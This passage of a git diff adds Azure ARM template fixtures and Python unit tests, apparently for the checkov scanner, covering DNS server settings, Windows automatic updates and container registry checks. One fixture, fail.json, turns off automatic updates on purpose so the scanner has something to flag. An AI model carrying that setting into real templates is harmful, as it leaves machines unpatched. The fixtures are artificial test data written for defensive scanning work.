+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "name": "pass2",
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2022-11-01",
+      "location": "[parameters('location')]",
+      "dependsOn": [],
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "ipconfig1",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              },
+              "privateIPAllocationMethod": "Dynamic"
+            }
+          }
+        ],
+        "dnsSettings": {
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/pass3.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass3.json
new file mode 100644
index 00000000000..bae54c1640b
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass3.json
@@ -0,0 +1,98 @@
+{
+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "name": "pass3",
+      "type": "Microsoft.Network/networkInterfaces",
+      "apiVersion": "2022-11-01",
+      "location": "[parameters('location')]",
+      "dependsOn": [],
+      "properties": {
+        "ipConfigurations": [
+          {
+            "name": "ipconfig1",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              },
+              "privateIPAllocationMethod": "Dynamic"
+            }
+          }
+        ],
+        "dnsSettings": {
+          "dnsServers": [
+            "10.7.7.2",
+            "10.7.7.7",
+            "10.7.7.1"
+          ]
+        }
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_VnetSingleDNSServer/pass4.json b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass4.json
new file mode 100644
index 00000000000..d21bd4426bd
--- /dev/null
+++ b/tests/arm/checks/resource/example_VnetSingleDNSServer/pass4.json
@@ -0,0 +1,323 @@
+{
+  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "location": {
+      "type": "string"
+    },
+    "osDiskType": {
+      "type": "string"
+    },
+    "addressPrefixes": {
+      "type": "array"
+    },
+    "subnets": {
+      "type": "array"
+    },
+    "virtualNetworkId": {
+      "type": "string"
+    },
+    "virtualNetworkName": {
+      "type": "string"
+    },
+    "networkSecurityGroups": {
+      "type": "array"
+    },
+    "networkInterfaceConfigurations": {
+      "type": "array"
+    },
+    "vmName": {
+      "type": "string"
+    },
+    "virtualMachineScaleSetName": {
+      "type": "string"
+    },
+    "instanceCount": {
+      "type": "string"
+    },
+    "instanceSize": {
+      "type": "string"
+    },
+    "adminUsername": {
+      "type": "string"
+    },
+    "securityType": {
+      "type": "string"
+    },
+    "secureBoot": {
+      "type": "bool"
+    },
+    "vTPM": {
+      "type": "bool"
+    },
+    "platformFaultDomainCount": {
+      "type": "string"
+    }
+  },
+  "variables": {
+    "storageApiVersion": "2021-01-01",
+    "networkApiVersion": "2020-11-01",
+    "virtualMachineScaleSetApiVersion": "2023-03-01",
+    "namingInfix": "[toLower(substring(concat(parameters('virtualMachineScaleSetName'), uniqueString(resourceGroup().id)), 0, 9))]"
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Network/virtualNetworks",
+      "apiVersion": "2023-11-01",
+      "name": "pass4",
+      "location": "string",
+      "tags": {
+        "tagName1": "tagValue1",
+        "tagName2": "tagValue2"
+      },
+      "extendedLocation": {
+        "name": "string",
+        "type": "EdgeZone"
+      },
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "string"
+          ]
+        },
+        "bgpCommunities": {
+          "virtualNetworkCommunity": "string"
+        },
+        "ddosProtectionPlan": {
+          "id": "string"
+        },
+        "dhcpOptions": {
+          "dnsServers": [
+            "10.7.7.2",
+            "10.7.7.7",
+            "10.7.7.1"
+          ]
+        },
+        "enableDdosProtection": "bool",
+        "enableVmProtection": "bool",
+        "encryption": {
+          "enabled": "bool",
+          "enforcement": "string"
+        },
+        "flowTimeoutInMinutes": "int",
+        "ipAllocations": [
+          {
+            "id": "string"
+          }
+        ],
+        "subnets": [
+          {
+            "id": "string",
+            "name": "string",
+            "properties": {
+              "addressPrefix": "string",
+              "addressPrefixes": [
+                "string"
+              ],
+              "applicationGatewayIPConfigurations": [
+                {
+                  "id": "string",
+                  "name": "string",
+                  "properties": {
+                    "subnet": {
+                      "id": "string"
+                    }
+                  }
+                }
+              ],
+              "defaultOutboundAccess": "bool",
+              "delegations": [
+                {
+                  "id": "string",
+                  "name": "string",
+                  "properties": {
+                    "serviceName": "string"
+                  },
+                  "type": "string"
+                }
+              ],
+              "ipAllocations": [
+                {
+                  "id": "string"
+                }
+              ],
+              "natGateway": {
+                "id": "string"
+              },
+              "networkSecurityGroup": {
+                "id": "string",
+                "location": "string",
+                "properties": {
+                  "flushConnection": "bool",
+                  "securityRules": [
+                    {
+                      "id": "string",
+                      "name": "string",
+                      "properties": {
+                        "access": "string",
+                        "description": "string",
+                        "destinationAddressPrefix": "string",
+                        "destinationAddressPrefixes": [
+                          "string"
+                        ],
+                        "destinationApplicationSecurityGroups": [
+                          {
+                            "id": "string",
+                            "location": "string",
+                            "properties": {},
+                            "tags": {}
+                          }
+                        ],
+                        "destinationPortRange": "string",
+                        "destinationPortRanges": [
+                          "string"
+                        ],
+                        "direction": "string",
+                        "priority": "int",
+                        "protocol": "string",
+                        "sourceAddressPrefix": "string",
+                        "sourceAddressPrefixes": [
+                          "string"
+                        ],
+                        "sourceApplicationSecurityGroups": [
+                          {
+                            "id": "string",
+                            "location": "string",
+                            "properties": {},
+                            "tags": {}
+                          }
+                        ],
+                        "sourcePortRange": "string",
+                        "sourcePortRanges": [
+                          "string"
+                        ]
+                      },
+                      "type": "string"
+                    }
+                  ]
+                },
+                "tags": {}
+              },
+              "privateEndpointNetworkPolicies": "string",
+              "privateLinkServiceNetworkPolicies": "string",
+              "routeTable": {
+                "id": "string",
+                "location": "string",
+                "properties": {
+                  "disableBgpRoutePropagation": "bool",
+                  "routes": [
+                    {
+                      "id": "string",
+                      "name": "string",
+                      "properties": {
+                        "addressPrefix": "string",
+                        "hasBgpOverride": "bool",
+                        "nextHopIpAddress": "string",
+                        "nextHopType": "string"
+                      },
+                      "type": "string"
+                    }
+                  ]
+                },
+                "tags": {}
+              },
+              "serviceEndpointPolicies": [
+                {
+                  "id": "string",
+                  "location": "string",
+                  "properties": {
+                    "contextualServiceEndpointPolicies": [
+                      "string"
+                    ],
+                    "serviceAlias": "string",
+                    "serviceEndpointPolicyDefinitions": [
+                      {
+                        "id": "string",
+                        "name": "string",
+                        "properties": {
+                          "description": "string",
+                          "service": "string",
+                          "serviceResources": [
+                            "string"
+                          ]
+                        },
+                        "type": "string"
+                      }
+                    ]
+                  },
+                  "tags": {}
+                }
+              ],
+              "serviceEndpoints": [
+                {
+                  "locations": [
+                    "string"
+                  ],
+                  "service": "string"
+                }
+              ],
+              "sharingScope": "string"
+            },
+            "type": "string"
+          }
+        ],
+        "virtualNetworkPeerings": [
+          {
+            "id": "string",
+            "name": "string",
+            "properties": {
+              "allowForwardedTraffic": "bool",
+              "allowGatewayTransit": "bool",
+              "allowVirtualNetworkAccess": "bool",
+              "doNotVerifyRemoteGateways": "bool",
+              "enableOnlyIPv6Peering": "bool",
+              "localAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "localSubnetNames": [
+                "string"
+              ],
+              "localVirtualNetworkAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "peerCompleteVnets": "bool",
+              "peeringState": "string",
+              "peeringSyncLevel": "string",
+              "remoteAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "remoteBgpCommunities": {
+                "virtualNetworkCommunity": "string"
+              },
+              "remoteSubnetNames": [
+                "string"
+              ],
+              "remoteVirtualNetwork": {
+                "id": "string"
+              },
+              "remoteVirtualNetworkAddressSpace": {
+                "addressPrefixes": [
+                  "string"
+                ]
+              },
+              "useRemoteGateways": "bool"
+            },
+            "type": "string"
+          }
+        ]
+      }
+    }
+  ],
+  "outputs": {
+    "adminUsername": {
+      "type": "string",
+      "value": "[parameters('adminUsername')]"
+    }
+  }
+}
\ No newline at end of file
diff --git a/tests/arm/checks/resource/example_WinVMAutomaticUpdates/fail.json b/tests/arm/checks/resource/example_WinVMAutomaticUpdates/fail.json
new file mode 100644
index 00000000000..c7e88aa5aff
--- /dev/null
+++ b/tests/arm/checks/resource/example_WinVMAutomaticUpdates/fail.json
@@ -0,0 +1,165 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vmSku": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "Size of VMs in the VM Scale Set."
+      }
+    },
+    "vmssName": {
+      "type": "string",
+      "metadata": {
+        "description": "Unique name for the scale set. Must be 3-61 characters in length and unique across the VNet."
+      },
+      "maxLength": 61
+    },
+    "instanceCount": {
+      "type": "int",
+      "metadata": {
+        "description": "Number of VM instances (100 or less)."
+      },
+      "defaultValue": 2
+    },
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username on all VMs."
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Admin password on all VMs."
+      }
+    },
+    "existingVnetName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the existing virtual network to deploy the scale set into."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location parameter"
+      }
+    },
+    "existingSubnetName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the existing subnet to deploy the scale set into."
+      }
+    }
+  },
+  "variables": {
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Compute/virtualMachineScaleSets",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "apiVersion": "2020-12-01",
+      "sku": {
+        "name": "[parameters('vmSku')]",
+        "capacity": "[parameters('instanceCount')]"
+      },
+      "properties": {
+        "overprovision": false,
+        "upgradePolicy": {
+          "mode": "Manual"
+        },
+        "virtualMachineProfile": {
+          "storageProfile": {
+            "osDisk": {
+              "createOption": "FromImage",
+              "caching": "ReadWrite"
+            },
+            "imageReference": {
+              "publisher": "MicrosoftWindowsServer",
+              "offer": "WindowsServer",
+              "sku": "2016-Datacenter",
+              "version": "latest"
+            }
+          },
+          "osProfile": {
+            "computerNamePrefix": "[parameters('vmssName')]",
+            "adminUsername": "[parameters('adminUsername')]",
+            "adminPassword": "[parameters('adminPassword')]",
+            "windowsConfiguration": {
+              "enableAutomaticUpdates": false,
+              "provisionVmAgent": true
+            }
+          },
+          "networkProfile": {
+            "networkInterfaceConfigurations": [
+              {
+                "name": "nic",
+                "properties": {
+                  "primary": true,
+                  "ipConfigurations": [
+                    {
+                      "name": "ipconfig",
+                      "properties": {
+                        "subnet": {
+                          "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('existingVnetName'), parameters('existingSubnetName'))]"
+                        }
+                      }
+                    }
+                  ]
+                }
+              }
+            ]
+          }
+        }
+      }
+    },
+    {
+      "name": "fail",
+      "type": "Microsoft.Compute/virtualMachines",
+      "apiVersion": "2019-12-01",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/networkInterfaces/', variables('networkInterfaceName'))]"
+      ],
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "[parameters('vmSize')]"
+        },
+        "storageProfile": {
+          "osDisk": {
+            "createOption": "fromImage",
+            "managedDisk": {
+              "storageAccountType": "[variables('osDiskType')]"
+            }
+          },
+          "imageReference": {
+            "publisher": "MicrosoftVisualStudio",
+            "offer": "visualstudio2019latest",
+            "sku": "vs-2019-comm-latest-ws2019",
+            "version": "latest"
+          }
+        },
+        "networkProfile": {
+          "networkInterfaces": [
+            {
+              "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('networkInterfaceName'))]"
+            }
+          ]
+        },
+        "osProfile": {
+          "computerName": "[parameters('vmName')]",
+          "adminUsername": "[parameters('adminUsername')]",
+          "adminPassword": "[parameters('adminPassword')]",
+          "windowsConfiguration": {
+            "enableAutomaticUpdates": false,
+            "provisionVmAgent": true
+          }
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_WinVMAutomaticUpdates/pass.json b/tests/arm/checks/resource/example_WinVMAutomaticUpdates/pass.json
new file mode 100644
index 00000000000..d3341021058
--- /dev/null
+++ b/tests/arm/checks/resource/example_WinVMAutomaticUpdates/pass.json
@@ -0,0 +1,229 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "vmSku": {
+      "type": "string",
+      "defaultValue": "Standard_D2s_v3",
+      "metadata": {
+        "description": "Size of VMs in the VM Scale Set."
+      }
+    },
+    "vmssName": {
+      "type": "string",
+      "metadata": {
+        "description": "Unique name for the scale set. Must be 3-61 characters in length and unique across the VNet."
+      },
+      "maxLength": 61
+    },
+    "instanceCount": {
+      "type": "int",
+      "metadata": {
+        "description": "Number of VM instances (100 or less)."
+      },
+      "defaultValue": 2
+    },
+    "adminUsername": {
+      "type": "string",
+      "metadata": {
+        "description": "Admin username on all VMs."
+      }
+    },
+    "adminPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Admin password on all VMs."
+      }
+    },
+    "existingVnetName": {
+      "type": "string",
+      "metadata": {
+        "description": "vName of the existing virtual network to deploy the scale set into."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location parameter"
+      }
+    },
+    "existingSubnetName": {
+      "type": "string",
+      "metadata": {
+        "description": "Name of the existing subnet to deploy the scale set into."
+      }
+    }
+  },
+  "variables": {
+  },
+  "resources": [
+    {
+      "type": "Microsoft.Compute/virtualMachineScaleSets",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "apiVersion": "2020-12-01",
+      "sku": {
+        "name": "[parameters('vmSku')]",
+        "capacity": "[parameters('instanceCount')]"
+      },
+      "properties": {
+        "overprovision": false,
+        "upgradePolicy": {
+          "mode": "Manual"
+        },
+        "virtualMachineProfile": {
+          "storageProfile": {
+            "osDisk": {
+              "createOption": "FromImage",
+              "caching": "ReadWrite"
+            },
+            "imageReference": {
+              "publisher": "MicrosoftWindowsServer",
+              "offer": "WindowsServer",
+              "sku": "2016-Datacenter",
+              "version": "latest"
+            }
+          },
+          "osProfile": {
+            "computerNamePrefix": "[parameters('vmssName')]",
+            "adminUsername": "[parameters('adminUsername')]",
+            "adminPassword": "[parameters('adminPassword')]",
+            "windowsConfiguration": {
+                        "enableAutomaticUpdates": true,
+                        "provisionVmAgent": true
+                    }
+          },
+          "networkProfile": {
+            "networkInterfaceConfigurations": [
+              {
+                "name": "nic",
+                "properties": {
+                  "primary": true,
+                  "ipConfigurations": [
+                    {
+                      "name": "ipconfig",
+                      "properties": {
+                        "subnet": {
+                          "id": "[resourceId('Microsoft.Network/virtualNetworks/subnets', parameters('existingVnetName'), parameters('existingSubNetName'))]"
+                        }
+                      }
+                    }
+                  ]
+                }
+              }
+            ]
+          }
+        }
+      }
+    },
+    {
+            "name": "pass",
+            "type": "Microsoft.Compute/virtualMachines",
+            "apiVersion": "2019-12-01",
+            "location": "[parameters('location')]",
+            "dependsOn": [
+                "[resourceId('Microsoft.Network/networkInterfaces/', variables('networkInterfaceName'))]"
+            ],
+            "properties": {
+                "hardwareProfile": {
+                    "vmSize": "[parameters('vmSize')]"
+                },
+                "storageProfile": {
+                    "osDisk": {
+                        "createOption": "fromImage",
+                        "managedDisk": {
+                            "storageAccountType": "[variables('osDiskType')]"
+                        }
+                    },
+                    "imageReference": {
+                        "publisher": "MicrosoftVisualStudio",
+                        "offer": "visualstudio2019latest",
+                        "sku": "vs-2019-comm-latest-ws2019",
+                        "version": "latest"
+                    }
+                },
+                "networkProfile": {
+                    "networkInterfaces": [
+                        {
+                            "id": "[resourceId('Microsoft.Network/networkInterfaces', variables('networkInterfaceName'))]"
+                        }
+                    ]
+                },
+                "osProfile": {
+                    "computerName": "[parameters('vmName')]",
+                    "adminUsername": "[parameters('adminUsername')]",
+                    "adminPassword": "[parameters('adminPassword')]",
+                    "windowsConfiguration": {
+                        "enableAutomaticUpdates": true,
+                        "provisionVmAgent": true
+                    }
+                }
+            }
+    },
+     {
+      "apiVersion": "2019-12-01",
+      "type": "Microsoft.Compute/virtualMachines",
+      "name": "missing",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[variables('storageAccountName')]",
+        "[variables('nicName')]"
+      ],
+      "properties": {
+        "hardwareProfile": {
+          "vmSize": "[parameters('vmSize')]"
+        },
+        "osProfile": {
+          "computerName": "[variables('vmName')]",
+          "adminUsername": "[parameters('adminUsername')]",
+          "adminPassword": "[parameters('adminPassword')]"
+        },
+        "storageProfile": {
+          "imageReference": {
+            "publisher": "[variables('imagePublisher')]",
+            "offer": "[variables('imageOffer')]",
+            "sku": "[parameters('windowsOSVersion')]",
+            "version": "latest"
+          }
+        }
+      }
+    },
+        {
+      "type": "Microsoft.Compute/virtualMachineScaleSets",
+      "name": "missing",
+      "location": "[parameters('location')]",
+      "apiVersion": "2020-12-01",
+      "sku": {
+        "name": "[parameters('vmSku')]",
+        "capacity": "[parameters('instanceCount')]"
+      },
+      "properties": {
+        "overprovision": false,
+        "upgradePolicy": {
+          "mode": "Manual"
+        },
+        "virtualMachineProfile": {
+          "storageProfile": {
+            "osDisk": {
+              "createOption": "FromImage",
+              "caching": "ReadWrite"
+            },
+            "imageReference": {
+              "publisher": "MicrosoftWindowsServer",
+              "offer": "WindowsServer",
+              "sku": "2016-Datacenter",
+              "version": "latest"
+            }
+          },
+          "osProfile": {
+            "computerNamePrefix": "[parameters('vmssName')]",
+            "adminUsername": "[parameters('adminUsername')]",
+            "adminPassword": "[parameters('adminPassword')]"
+
+          }
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/test_ACRAdminAccountDisabled.py b/tests/arm/checks/resource/test_ACRAdminAccountDisabled.py
new file mode 100644
index 00000000000..23b27e2c867
--- /dev/null
+++ b/tests/arm/checks/resource/test_ACRAdminAccountDisabled.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.ACRAdminAccountDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestACRAdminAccountDisabled(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_ACRAdminAccountDisabled"
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerRegistry/registries.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerRegistry/registries.fail'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_ACRAnonymousPullDisabled.py b/tests/arm/checks/resource/test_ACRAnonymousPullDisabled.py
new file mode 100644
index 00000000000..3f1e6ee4f03
--- /dev/null
+++ b/tests/arm/checks/resource/test_ACRAnonymousPullDisabled.py
@@ -0,0 +1,46 @@
+import unittest
+from pathlib import Path
+
+from checkov.arm.checks.resource.ACRAnonymousPullDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestACRAnonymousPullDisabled(unittest.TestCase):
+    def test_summary(self):
+        # given
+        test_files_dir = Path(__file__).parent / "example_ACRAnonymousPullDisabled"
+
+        # when
+        report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id]))
+
+        # then
+        summary = report.get_summary()
+
+        passing_resources = {
+            "Microsoft.ContainerRegistry/registries.pass",
+            "Microsoft.ContainerRegistry/registries.pass2",
+            "Microsoft.ContainerRegistry/registries.pass3",
+            "Microsoft.ContainerRegistry/registries.pass4",
+            "Microsoft.ContainerRegistry/registries.pass5",
+            "Microsoft.ContainerRegistry/registries.pass6"
+        }
+        failing_resources = {
+            "Microsoft.ContainerRegistry/registries.fail",
+            "Microsoft.ContainerRegistry/registries.fail2"
+        }
+
+        passed_check_resources = {c.resource for c in report.passed_checks}
+        failed_check_resources = {c.resource for c in report.failed_checks}
+
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
+        self.assertEqual(summary["skipped"], 0)
+        self.assertEqual(summary["parsing_errors"], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_ACRContainerScanEnabled.py b/tests/arm/checks/resource/test_ACRContainerScanEnabled.py
new file mode 100644
index 00000000000..8b527cdfb81
--- /dev/null
+++ b/tests/arm/checks/resource/test_ACRContainerScanEnabled.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.ACRContainerScanEnabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestACRContainerScanEnabled(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_ACRContainerScanEnabled"
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerRegistry/registries.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerRegistry/registries.fail'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_ACREnableImageQuarantine.py b/tests/arm/checks/resource/test_ACREnableImageQuarantine.py
new file mode 100644
index 00000000000..30f79fa5b7f
--- /dev/null
+++ b/tests/arm/checks/resource/test_ACREnableImageQuarantine.py
@@ -0,0 +1,41 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.ACREnableImageQuarantine import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestACREnableImageQuarantine(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_ACREnableImageQuarantine")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerRegistry/registries.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerRegistry/registries.fail'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_ACREnableZoneRedundancy.py b/tests/arm/checks/resource/test_ACREnableZoneRedundancy.py
new file mode 100644
index 00000000000..6901ba57c26
--- /dev/null
+++ b/tests/arm/checks/resource/test_ACREnableZoneRedundancy.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+
+from checkov.runner_filter import RunnerFilter
+from checkov.arm.runner import Runner
+from checkov.arm.checks.resource.ACREnableZoneRedundancy import check
+
+
+class TestACREnableZoneRedundancy(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = os.path.join(current_dir, "example_ACREnableZoneRedundancy")
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerRegistry/registries.pass',
+            'Microsoft.ContainerRegistry/registries/replications.pass2',
+        }
+        failing_resources = {
+            'Microsoft.ContainerRegistry/registries.fail1',
+            'Microsoft.ContainerRegistry/registries/replications.fail2',
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], len(passing_resources))
+        self.assertEqual(summary['failed'], len(failing_resources))
+        self.assertEqual(summary['skipped'], len(skipped_resources))
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/tests/arm/checks/resource/test_ACRPublicNetworkAccessDisabled.py b/tests/arm/checks/resource/test_ACRPublicNetworkAccessDisabled.py
new file mode 100644
index 00000000000..a78d1668fde
--- /dev/null
+++ b/tests/arm/checks/resource/test_ACRPublicNetworkAccessDisabled.py
@@ -0,0 +1,43 @@
+import os
+import unittest
+
+from checkov.arm.checks.resource.ACRPublicNetworkAccessDisabled import check
+from checkov.arm.runner import Runner
+from checkov.runner_filter import RunnerFilter
+
+
+class TestACRPublicNetworkAccessDisabled(unittest.TestCase):
+
+    def test_summary(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_ACRPublicNetworkAccessDisabled"
+        report = runner.run(root_folder=test_files_dir,
+                            runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'Microsoft.ContainerRegistry/registries.pass',
+        }
+        failing_resources = {
+            'Microsoft.ContainerRegistry/registries.fail'
+        }
+        skipped_resources = {}
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+
+
+        self.assertEqual(summary['passed'], len(passing_resources))
